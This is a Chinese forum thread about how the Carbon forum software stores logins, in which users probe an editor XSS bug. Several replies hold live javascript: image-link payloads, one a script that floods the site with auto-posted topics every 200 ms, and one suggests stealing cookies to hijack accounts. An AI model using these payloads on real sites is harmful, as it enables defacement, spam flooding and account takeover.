Carbon是怎样存储登录信息的?
Carbon是怎样存储登录信息的?
- 登录后方可回帖
19 个回复 | 最后更新于 2018-06-08
ihacker
2018-05-27
#1
![](javascript:(p=>{alert("YouHaveBeenPranked");return"//cdn.94cb.com/static/editor/dialogs/emotion/images/pp/i_f16.png";})();)
world
2018-05-27
#2
回复#1 @ihacker :
验证码刷新了就没什么大碍了。
那个BUG只是XSS自跨域脚本攻击而已。
编辑器加强过滤就可以解决的。
为什么你不试试XSS直接把Cookies发送到你的服务器呢?这样就可以盗号了!
ihacker
2018-05-27
#3
回复#2 @world :
懒得买服务器了,免费的质量不好。
![](javascript:(jio=>{alert("ThisEditorHadSecurtiyBug!");return"//cdn.94cb.com/static/editor/dialogs/emotion/images/pp/i_f16.png";})(0);)
lincanbin
2018-05-27
#4
回复#1 @ihacker :
点不了啊。
{setInterval(function(){$.post("/new",{FormHash:"1d65517c",Title:"iHacker-"+parseInt(Math.random()*1000000000000).toString(16),Content:"Thisisattackedbyscriptbyme.<imgsrc=\"/static/editor/dialogs/emotion/images/pp/i_f25.png\"/><br/>GoogleDDOSAttacker.",Tag:["Google","DDOS","",""]},function(rq){posted(rq.TopicID);});},200);})();functionposted(id){console.log("ID"+id);}){kind=link}
lincanbin
2018-05-27
#6
回复#5 @ihacker :
不行。
lincanbin
2018-05-27
#7
好奇的小野猫
2018-05-27
#8
回复#1 @ihacker :
点了没什么呀
world
2018-05-27
#9
ihacker
2018-05-27
#10
回复#9 @world :
可惜你的被滤掉了
70博洋
2018-05-27
#11
回复#1 @ihacker :
3259
好奇的小野猫
2018-05-27
#12
回复#11 @70博洋 :
眼力不错。或者你开了高对比度。
lincanbin
2018-05-27
#13
回复#2 @world :
Cookie是HTTP Only的,不可能获取。
70博洋
2018-05-28
#14
回复#12 @好奇的小野猫 :
没呀 仔细一看瞪一下眼就看出来了
好奇的小野猫
2018-05-28
#15
回复#13 @lincanbin :
document.cookie
lincanbin
2018-05-28
#16
回复#15 @好奇的小野猫 :
不行的,拿不到,你可以自己在Console里跑一下,看能不能得到Cookie。
ihacker
2018-05-28
#17
回复#16 @lincanbin :
lincanbin
2018-05-28
#18
回复#17 @ihacker :
对吧,没有Carbon开头的任何Cookie。
yup2333
2018-06-08
#19